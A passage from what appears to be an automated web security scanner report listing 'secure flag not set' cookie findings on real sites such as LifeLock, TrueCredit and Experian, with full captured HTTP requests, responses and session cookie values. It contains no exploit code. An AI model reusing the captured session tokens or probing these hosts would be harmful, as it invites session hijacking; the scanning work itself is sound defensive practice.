The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...

11.16. https://security.live.com/LoginStage.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 25919
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=ucdfqwzg0orvw3jxqhywn2mz; path=/; HttpOnly
Set-Cookie: xid=b79f02fa-b994-43d5-a76d-1fdbf35adae9&&BAYxxxxxxx1D05&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=930347861&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 24-Apr-2011 15:16:18 GMT; path=/
Set-Cookie: wlv=A|_-d:s*stM6Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:tuRFqrfQzYg=:2A86sT3CApx4bD1TSQD2FQiQePyCL8+HQuLs/qy4iBg=:F; domain=.live.com; path=/
PPServer: PPV: 30 H: BAYIDSTOOL1D05 V: 0
Date: Sun, 24 Apr 2011 16:56:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

11.17. https://www.experiandirect.com/triplealert/default.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.experiandirect.com
Path:   /triplealert/default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/default.aspx HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjpcey55elklnvvzl01tip45; path=/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: OriginalReferrer=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:27:53 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavFlowID=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NumTrialDaysLeft=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=9e0b3c3a11964bc180ff938f140a5433; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Protect yourself from identity theft with Credit Monitoring from TripleAlert.com
       </title>
       <meta nam
...[SNIP]...

11.18. https://www.truecredit.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_visit%3D1%7C1303676208552%3B%20s_depth%3D1%7C1303676208554%3B%20dfa_cookie%3Dtuitruecredit%7C1303676208557%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%255D%7C1461527208560%3B%20s_nr%3D1303674408563%7C1306266408563%3B%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303676208564%3B%20s_lv%3D1303674408567%7C1398282408567%3B%20s_lv_s%3DFirst%2520Visit%7C1303676208567%3B%20s_pv%3Dtc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676208571%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674408562%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:15:30 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303676130100
Set-Cookie: JSESSIONID=aI2zc6tC6-qf; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29076


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>On
...[SNIP]...

11.19. https://www.truecredit.com/products/optimizedOrder.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /products/optimizedOrder.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_depth%3D1%7C1303693477019%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_visit%3D1%7C1303693853489%3B%20dfa_cookie%3Dtuitruecredit%7C1303693853506%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%255D%7C1461544853528%3B%20s_invisit%3Dtrue%7C1303693853537%3B%20s_lv%3D1303692053541%7C1398300053541%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693853541%3B%20s_pv%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%7C1303693853547%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303691677051%3B%20s_ppv%3D100%3B%20SC_LINKS%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%255E%255Ehttp%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255Etc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%2520%257C%2520http%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:04 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303695004739
Set-Cookie: TCVISIT=558558858-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=dEs-TS58-_K8; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Ch
...[SNIP]...

11.20. https://www.truecredit.com/products/optimizedOrderProcess  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /products/optimizedOrderProcess

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /products/optimizedOrderProcess HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU
Cache-Control: max-age=0
Origin: https://www.truecredit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_depth%3D2%7C1303693860797%3B%20s_visit%3D1%7C1303693873610%3B%20dfa_cookie%3Dtuitruecredit%7C1303693873619%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%252C%255B'%25257C%25257C%25257C%25257CFree7DayTrialSingleCMU%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692060815'%255D%252C%255B'%25257C%25257C%25257C%25257CFree7DayTrialSingleCMU%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692073007'%255D%252C%255B'%25257C%25257C%25257C%25257CFree7DayTrialSingleCMU%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692073645'%255D%255D%7C1461544873645%3B%20s_invisit%3Dtrue%7C1303693873654%3B%20s_lv%3D1303692073661%7C1398300073661%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693873661%3B%20s_pv%3Dtc%253Atc%253Atc%253AOrder%2520Form%253A%2520Personal%2520Info%2520%252F%2520Account%2520details%7C1303693873673%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B%20s_sq%3Dtuitruecredit%253D%252526pid%25253Dtc%2525253Atc%2525253Atc%2525253AOrder%25252520Form%2525253A%25252520Personal%25252520Info%25252520%2525252F%25252520Account%25252520details%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257Bnextpage%2525253Dtrue%2525253Bdocument.optimizedOrder.submit()%2525253Breturnfalse%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Content-Length: 361

formName=optimizedOrder&versionID=0&title=0&firstName=&middleName=&lastName=&suffix=0&email=&mailAddress=&mailCity=&mailState=&mailZipCode=&prevAddressTwoYears=&prevCityTwoYears=&prevStateTwoYears=&pr
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 01:30:09 GMT
Server: Apache
Cache-Control: private
enable-url-rewriting: true
Location: https://www.truecredit.com/products/optimizedOrder.jsp
Set-Cookie: TLSESSIONID=1303695009711
Set-Cookie: JSESSIONID=d6FtIxwFg9Ha; path=/
Content-Length: 92
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

The URL has moved <a href="https://www.truecredit.com/products/optimizedOrder.jsp">here</a>

11.21. https://www.truecredit.com/products/order2.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /products/order2.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-174a3c150b7e7f3b565b HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:12:21 GMT
Server: Apache
Cache-Control: no-cache,must-revalidate
pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: TLSESSIONID=1303675941653
Set-Cookie: TCID=1303675941653:AM_; path=/; expires=Mon, 11-Apr-2061 20:12:21 GMT
Set-Cookie: JSESSIONID=if_ae8AEJAM_; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12840


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onl
...[SNIP]...

11.22. https://www.truecredit.com/user/returnUser.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /user/returnUser.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/returnUser.jsp?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-174a3c150b7e7f3b565b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_depth%3D2%7C1303676296690%3B%20s_visit%3D1%7C1303676296771%3B%20dfa_cookie%3Dtuitruecredit%7C1303676296794%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674496699'%255D%252C%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%255D%7C1461527296801%3B%20s_nr%3D1303674496805%7C1306266496805%3B%20s_invisit%3Dtrue%7C1303676296810%3B%20s_lv%3D1303674496815%7C1398282496815%3B%20s_lv_s%3DFirst%2520Visit%7C1303676296815%3B%20s_pv%3Dtc%253Atc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676296824%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20SC_LINKS%3Dtc%253Atc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%255E%255ELog%2520into%2520your%2520account%255E%255Etc%253Atc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%2520%257C%2520Log%2520into%2520your%2520account%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:16:02 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303676162226
Set-Cookie: JSESSIONID=a_yt5CZn2T8f; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34305


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onli
...[SNIP]...

11.23. https://www.truecredit.com/user/returnUserProcess  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /user/returnUserProcess

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /user/returnUserProcess?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/user/returnUser.jsp?cb=credit
Cache-Control: max-age=0
Origin: https://www.truecredit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_depth%3D4%7C1303676301167%3B%20s_nr%3D1303674501185%7C1306266501185%3B%20s_visit%3D1%7C1303680175830%3B%20dfa_cookie%3Dtuitruecredit%7C1303680175838%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674496699'%255D%252C%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%255D%7C1461531175845%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303680175849%3B%20s_lv%3D1303678375858%7C1398286375858%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680175858%3B%20s_pv%3Dtc%253Atc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680175866%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674501182%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B%20s_sq%3Dtuitruecredit%253D%252526pid%25253Dtc%2525253Atc%2525253ALogin%25252520%2525253A%25252520Return%25252520User%25252520Login%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257Bnextpage%2525253Dtrue%2525253Bdocument.memberLogin.submit()%2525253Breturnfalse%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Content-Length: 87

formName=memberLogin&versionID=0&username=&password=&loginPage=%2Fuser%2FreturnUser.jsp

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:52:44 GMT
Server: Apache
Cache-Control: private
enable-url-rewriting: true
Location: https://www.truecredit.com/user/returnUser.jsp?incorrect=true&cb=credit
Set-Cookie: TLSESSIONID=1303678364906
Set-Cookie: JSESSIONID=abH_XutDvEw9; path=/
Content-Length: 109
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

The URL has moved <a href="https://www.truecredit.com/user/returnUser.jsp?incorrect=true&cb=credit">here</a>

11.24. https://crm.infusionsoft.com/go/infs/footer_psr/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://crm.infusionsoft.com
Path:   /go/infs/footer_psr/web

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/infs/footer_psr/web HTTP/1.1
Host: crm.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/AddForms/processFormSecure.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: affiliate=footer_psr; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: src=web; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: contactId=0; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: jumpLog=6315978; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: linkedJumpLog=""; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Location: http://infusionsoft.com
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Mon, 25 Apr 2011 01:06:39 GMT


11.25. https://inter.viewcentral.com/events/cust/search_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/cust/search_results.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1 HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Date: Sun, 24 Apr 2011 20:28:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="javascript">


function getCookieVal (offset) {
var
...[SNIP]...

